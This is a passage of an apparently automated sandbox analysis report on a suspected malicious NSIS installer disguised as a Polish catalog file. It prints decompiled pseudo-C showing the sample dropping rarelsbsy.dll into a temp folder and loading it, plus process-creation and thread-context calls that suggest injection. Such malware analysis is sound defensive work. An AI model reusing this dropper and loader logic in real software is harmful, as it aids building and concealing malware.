							goto L34;
						}
					}
					_t74 = GetTickCount();
					 *0x40b5ac =  *0x40b5ac & 0x00000000;
					 *0x40b5a8 =  *0x40b5a8 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t74;
					 *0x40b090 = 8;
					 *0x414c38 = 0x40cc30;
					 *0x414c34 = 0x40cc30;
					 *0x414c30 = 0x414c30;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t104 = 0x4000;
						if(_a16 < 0x4000) {
							_t104 = _a16;
						}
						if(E004030B0(0x414c48, _t104) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t104;
						 *0x40b080 = 0x414c48;
						 *0x40b084 = _t104;
						while(1) {
							_t100 = _v16;
							 *0x40b088 = _t100;
							 *0x40b08c = _v12;
							_t79 = E00406034(0x40b080);
							_v28 = _t79;
							if(_t79 < 0) {
								break;
							}
							_t105 =  *0x40b088; // 0x41f64c
							_t106 = _t105 - _t100;
							_t80 = GetTickCount();
							_t101 = _t80;
							if(( *0x42ecd4 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t107 = _t107 + 0xc;
								E00404EB3(0,  &_v92);
								_v20 = _t101;
							}
							if(_t106 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_t82 =  *0x40b088; // 0x41f64c
									_v8 = _v8 + _t106;
									_v12 = _v12 - _t106;
									_v16 = _t82;
									L24:
									if(_v28 != 1) {
										continue;
									}
									goto L45;
								}
								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
								if(_t84 == 0 || _v24 != _t106) {
									goto L29;
								} else {
									_v8 = _v8 + _t106;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}



























                                                  0x00402e96
                                                  0x00402e9a
                                                  0x00402e9d
                                                  0x00402ea2
                                                  0x00402ea4
                                                  0x00402ea4
                                                  0x00402eab
                                                  0x00402eaf
                                                  0x00402eb4
                                                  0x00402eb6
                                                  0x00402eb6
                                                  0x00402ebd
                                                  0x00402ec2
                                                  0x00402ec4
                                                  0x00402ecd
                                                  0x00402ecd
                                                  0x00402ed8
                                                  0x00402edf
                                                  0x0040305b
                                                  0x0040305b
                                                  0x00000000
                                                  0x00402ee5
                                                  0x00402ee9
                                                  0x00403046
                                                  0x0040309b
                                                  0x00403060
                                                  0x00403066
                                                  0x00403068
                                                  0x00403068
                                                  0x00403079
                                                  0x00000000
                                                  0x0040307b
                                                  0x0040308e
                                                  0x00403040
                                                  0x00403040
                                                  0x0040305d
                                                  0x0040305d
                                                  0x00000000
                                                  0x00403095
                                                  0x00403095
                                                  0x00403098
                                                  0x00000000
                                                  0x00403098
                                                  0x0040308e
                                                  0x00403079
                                                  0x004030a6
                                                  0x00000000
                                                  0x004030a6
                                                  0x0040304b
                                                  0x0040304d
                                                  0x0040304d
                                                  0x00403059
                                                  0x004030a3
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403059
                                                  0x00402ef5
                                                  0x00402ef7
                                                  0x00402efe
                                                  0x00402f05
                                                  0x00402f05
                                                  0x00402f0c
                                                  0x00402f14
                                                  0x00402f1e
                                                  0x00402f23
                                                  0x00402f2b
                                                  0x00402f35
                                                  0x00402f38
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00402f3e
                                                  0x00402f3e
                                                  0x00402f3e
                                                  0x00402f46
                                                  0x00402f48
                                                  0x00402f48
                                                  0x00402f59
                                                  0x00000000
                                                  0x00000000
                                                  0x00402f5f
                                                  0x00402f62
                                                  0x00402f68
                                                  0x00402f6e
                                                  0x00402f6e
                                                  0x00402f79
                                                  0x00402f7f
                                                  0x00402f84
                                                  0x00402f8b
                                                  0x00402f8e
                                                  0x00000000
                                                  0x00000000
                                                  0x00402f94
                                                  0x00402f9a
                                                  0x00402f9c
                                                  0x00402fa5
                                                  0x00402fa7
                                                  0x00402fd5
                                                  0x00402fdb
                                                  0x00402fe4
                                                  0x00402fe9
                                                  0x00402fe9
                                                  0x00402ff0
                                                  0x00403034
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00402ff2
                                                  0x00402ff5
                                                  0x00403017
                                                  0x0040301c
                                                  0x0040301f
                                                  0x00403022
                                                  0x00403025
                                                  0x00403029
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040302f
                                                  0x00403003
                                                  0x0040300b
                                                  0x00000000
                                                  0x00403012
                                                  0x00403012
                                                  0x00000000
                                                  0x00403012
                                                  0x0040300b
                                                  0x00402ff0
                                                  0x0040303c
                                                  0x00000000
                                                  0x0040303c
                                                  0x00000000
                                                  0x00402f3e

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00402EF5
                                                  • GetTickCount.KERNEL32 ref: 00402F9C
                                                  • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402FC5
                                                  • wsprintfA.USER32 ref: 00402FD5
                                                  • WriteFile.KERNELBASE(00000000,00000000,0041F64C,7FFFFFFF,00000000), ref: 00403003
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CountTick$FileWritewsprintf
                                                  • String ID: ... %d%%$HLA$HLA$ber
                                                  • API String ID: 4209647438-2043853910
                                                  • Opcode ID: 2ed182f22c19ccbe5ebd44aa976ae303b5dd6c485202a0ec0c370d738780273e
                                                  • Instruction ID: 15109c7e5c0d48913ae26536c30eb2ff4c12f072ab55fd5dd83b367320b2a29b
                                                  • Opcode Fuzzy Hash: 2ed182f22c19ccbe5ebd44aa976ae303b5dd6c485202a0ec0c370d738780273e
                                                  • Instruction Fuzzy Hash: 2C618E71902219DBDB10DF65EA44AAF7BB8EB04356F10417BF910B72C4D7789A40CBE9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401751, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 73%
                                                  			E00401751(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402A29(0x31);
				 *(_t85 - 0xc) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405727(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E004056BA(E00405BC7(0x409c40, "C:\\Users\\engineer\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c40);
					E00405BC7();
				}
				E00405E29(0x409c40);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405EC2(0x409c40);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040587F(0x409c40);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040589E(0x409c40, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404EB3(0xffffffe2,  *(_t85 - 0xc));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42eca8;
						goto L32;
					} else {
						E00405BC7(0x40a440, 0x42f000);
						E00405BC7(0x42f000, 0x409c40);
						E00405BE9(_t75, 0x40a440, 0x409c40, "C:\Users\engineer\AppData\Local\Temp\nss48B9.tmp\rarelsbsy.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00405BC7(0x42f000, 0x40a440);
						_t62 = E00405488("C:\Users\engineer\AppData\Local\Temp\nss48B9.tmp\rarelsbsy.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42eca8 =  &( *0x42eca8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c40);
								_push(0xfffffffa);
								E00404EB3();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404EB3(0xffffffea,  *(_t85 - 0xc));
				 *0x42ecd4 =  *0x42ecd4 + 1;
				_t43 = E00402E8E( *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 8), _t75, _t75); // executed
				 *0x42ecd4 =  *0x42ecd4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 8)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405BE9(_t75, _t80, 0x409c40, 0x409c40, 0xffffffee);
					} else {
						E00405BE9(_t75, _t80, 0x409c40, 0x409c40, 0xffffffe9);
						lstrcatA(0x409c40,  *(_t85 - 0xc));
					}
					_push(0x200010);
					_push(0x409c40);
					E00405488();
					goto L29;
				}
				goto L33;
			}
















                                                  0x00401751
                                                  0x00401758
                                                  0x00401761
                                                  0x00401764
                                                  0x00401767
                                                  0x0040176c
                                                  0x00401774
                                                  0x00401790
                                                  0x00401776
                                                  0x00401776
                                                  0x00401777
                                                  0x00401777
                                                  0x00401796
                                                  0x004017a0
                                                  0x004017a0
                                                  0x004017a4
                                                  0x004017a7
                                                  0x004017ac
                                                  0x004017ae
                                                  0x004017b0
                                                  0x004017b5
                                                  0x004017b5
                                                  0x004017c0
                                                  0x004017c0
                                                  0x004017d1
                                                  0x004017d3
                                                  0x004017d3
                                                  0x004017d4
                                                  0x004017d4
                                                  0x004017d7
                                                  0x004017da
                                                  0x004017dd
                                                  0x004017dd
                                                  0x004017e4
                                                  0x004017f3
                                                  0x004017f8
                                                  0x004017fb
                                                  0x004017fe
                                                  0x00000000
                                                  0x00000000
                                                  0x00401800
                                                  0x00401803
                                                  0x0040185d
                                                  0x00401862
                                                  0x004015a8
                                                  0x0040268f
                                                  0x0040268f
                                                  0x004028be
                                                  0x004028c1
                                                  0x004028c1
                                                  0x00000000
                                                  0x00401805
                                                  0x0040180b
                                                  0x00401816
                                                  0x00401823
                                                  0x0040182e
                                                  0x00401844
                                                  0x00401844
                                                  0x00401847
                                                  0x00000000
                                                  0x0040184d
                                                  0x0040184d
                                                  0x0040184e
                                                  0x0040186b
                                                  0x004028c7
                                                  0x004028c7
                                                  0x004028c7
                                                  0x00401850
                                                  0x00401850
                                                  0x00401851
                                                  0x00401492
                                                  0x00402241
                                                  0x00402241
                                                  0x00402241
                                                  0x0040184e
                                                  0x00401847
                                                  0x004028c9
                                                  0x004028cd
                                                  0x004028cd
                                                  0x0040187b
                                                  0x00401880
                                                  0x0040188e
                                                  0x00401893
                                                  0x00401899
                                                  0x0040189d
                                                  0x0040189f
                                                  0x004018a7
                                                  0x004018b3
                                                  0x004018a1
                                                  0x004018a1
                                                  0x004018a5
                                                  0x00000000
                                                  0x00000000
                                                  0x004018a5
                                                  0x004018bc
                                                  0x004018c2
                                                  0x004018c4
                                                  0x00000000
                                                  0x004018ca
                                                  0x004018ca
                                                  0x004018cd
                                                  0x004018e5
                                                  0x004018cf
                                                  0x004018d2
                                                  0x004018db
                                                  0x004018db
                                                  0x004018ea
                                                  0x004018ef
                                                  0x0040223c
                                                  0x00000000
                                                  0x0040223c
                                                  0x00000000

                                                  APIs
                                                  • lstrcatA.KERNEL32(00000000,00000000,rtrystwqtc,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401790
                                                  • CompareFileTime.KERNEL32(-00000014,?,rtrystwqtc,rtrystwqtc,00000000,00000000,rtrystwqtc,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BA
                                                    • Part of subcall function 00405BC7: lstrcpynA.KERNEL32(?,?,00000400,004031D8,egkwshqw Setup,NSIS Error), ref: 00405BD4
                                                    • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,0041F64C,747DEA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                                    • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041F64C,747DEA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                                    • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041F64C,747DEA30), ref: 00404F0F
                                                    • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                                    • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
                                                    • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
                                                    • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nss48B9.tmp$C:\Users\user\AppData\Local\Temp\nss48B9.tmp\rarelsbsy.dll$rtrystwqtc
                                                  • API String ID: 1941528284-1524841839
                                                  • Opcode ID: 95e67b310e6745b10a35ef5b552587608c142c3317b69d328c6358dc637ee1da
                                                  • Instruction ID: c8ecff54efbd1983964958a71a4b78ec9a68474d29a8073c081a3edbe3f43163
                                                  • Opcode Fuzzy Hash: 95e67b310e6745b10a35ef5b552587608c142c3317b69d328c6358dc637ee1da
                                                  • Instruction Fuzzy Hash: 8541B631904514BBCB107BA6CC45DAF3678EF01329F60823BF521F11E1D63CAA419EAE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405375, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00405375(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x40735c;
				_v36.Group = 0x40735c;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x40734c;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                  0x00405380
                                                  0x00405384
                                                  0x00405387
                                                  0x0040538d
                                                  0x00405391
                                                  0x00405395
                                                  0x0040539d
                                                  0x004053a4
                                                  0x004053aa
                                                  0x004053b1
                                                  0x004053b8
                                                  0x004053c0
                                                  0x004053c2
                                                  0x00000000
                                                  0x004053c2
                                                  0x004053cc
                                                  0x004053d3
                                                  0x004053e9
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004053eb
                                                  0x004053ef

                                                  APIs
                                                  • CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 004053B8
                                                  • GetLastError.KERNEL32 ref: 004053CC
                                                  • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053E1
                                                  • GetLastError.KERNEL32 ref: 004053EB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                  • String ID: C:\Users\user\Desktop$Ls@$\s@
                                                  • API String ID: 3449924974-1629030221
                                                  • Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                  • Instruction ID: 9862b429919ab471ad7b2dc8692991af43e8f75a2b46e14c68af8680499b7529
                                                  • Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                  • Instruction Fuzzy Hash: 78010C71D14219DADF019BA0DC447EFBFB8EB04354F00453AE904B6180E3B89614CFA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1001601A, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 237processthreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 1001615E
                                                  • GetThreadContext.KERNELBASE(?,00010007), ref: 10016181
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ContextCreateProcessThread
                                                  • String ID: D
                                                  • API String ID: 2843130473-2746444292
                                                  • Opcode ID: 8503608d335ae0c1c7c187de458b0b5e7d1eeca9331417821db36ef7658a064a
                                                  • Instruction ID: ca23d4e3055732342490b46184f12bf0358ba2633ee4662b3825b44e89c3ae73
                                                  • Opcode Fuzzy Hash: 8503608d335ae0c1c7c187de458b0b5e7d1eeca9331417821db36ef7658a064a
                                                  • Instruction Fuzzy Hash: 89A1D174E00209EFDB40DFA4CD81BAEBBB9EF08345F244469E915EB251D771EA81DB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405EE9, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00405EE9(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x409010; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                                                  0x00405f00
                                                  0x00405f09
                                                  0x00405f0b
                                                  0x00405f0b
                                                  0x00405f0f
                                                  0x00405f21
                                                  0x00405f1b
                                                  0x00405f1b
                                                  0x00405f1b
                                                  0x00405f25
                                                  0x00405f39
                                                  0x00405f4d
                                                  0x00405f54

                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32 ref: 00405F00
                                                  • wsprintfA.USER32 ref: 00405F39
                                                  • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F4D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%s.dll$UXTHEME$\
                                                  • API String ID: 2200240437-4240819195
                                                  • Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                                  • Instruction ID: fa246daef39c5d1266dc05b53ca8af7bf1dea281c1fa5b10d5a6498bb1fbd0ec
                                                  • Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                                  • Instruction Fuzzy Hash: AAF0F63094050A6BDB14AB64DC0DFFB365CFB08305F1404BAB646E20C2E678E9158FAD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10015004, Relevance: 9.2, APIs: 6, Instructions: 199fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E10015004() {

				goto 0x100157e1;
			}



                                                  0x10015004

                                                  APIs
                                                  • GetTempPathW.KERNELBASE(00000103,?), ref: 10015978
                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 100159A2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CreateFilePathTemp
                                                  • String ID:
                                                  • API String ID: 1031868398-0
                                                  • Opcode ID: a247b2f1427a00d5c6ef4ae1e7c0fbfdf51d3505b67c05fe188a2625eb606fa0
                                                  • Instruction ID: 4f146de04ca3e81ba12eabfefae8d48ee7cc0c1e2ed152c94c4989443c7fdb84
                                                  • Opcode Fuzzy Hash: a247b2f1427a00d5c6ef4ae1e7c0fbfdf51d3505b67c05fe188a2625eb606fa0
                                                  • Instruction Fuzzy Hash: 5C715A35E50348EAEB60DBE4E856BEDB7B5EF48710F20441AF608EE2E0D7715A81DB05
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004058CD, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004058CD(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                                  0x004058d1
                                                  0x004058d7
                                                  0x004058d8
                                                  0x004058d8
                                                  0x004058d9
                                                  0x004058e0
                                                  0x004058ea
                                                  0x004058f7
                                                  0x004058fa
                                                  0x00405902
                                                  0x00000000
                                                  0x00000000
                                                  0x00405906
                                                  0x00000000
                                                  0x00000000
                                                  0x00405908
                                                  0x00000000
                                                  0x00405908
                                                  0x00000000

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 004058E0
                                                  • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004058FA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-2861158128
                                                  • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                  • Instruction ID: 53182d5486abb24f79a58d6e85a6b3ecacc509e50e1b88e8db4ee69f85448782
                                                  • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                  • Instruction Fuzzy Hash: E8F0A736348258BBD7115E56DC04B9F7F99DFD1760F10C027FA049A280D6B09A54C7A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401F84, Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 60%
                                                  			E00401F84(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42ecd8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42eca8 =  *0x42eca8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402A29(0xfffffff0);
				 *(_t34 + 8) = E00402A29(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404EB3(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x42f000, 0x40b040, 0x409000); // executed
						} else {
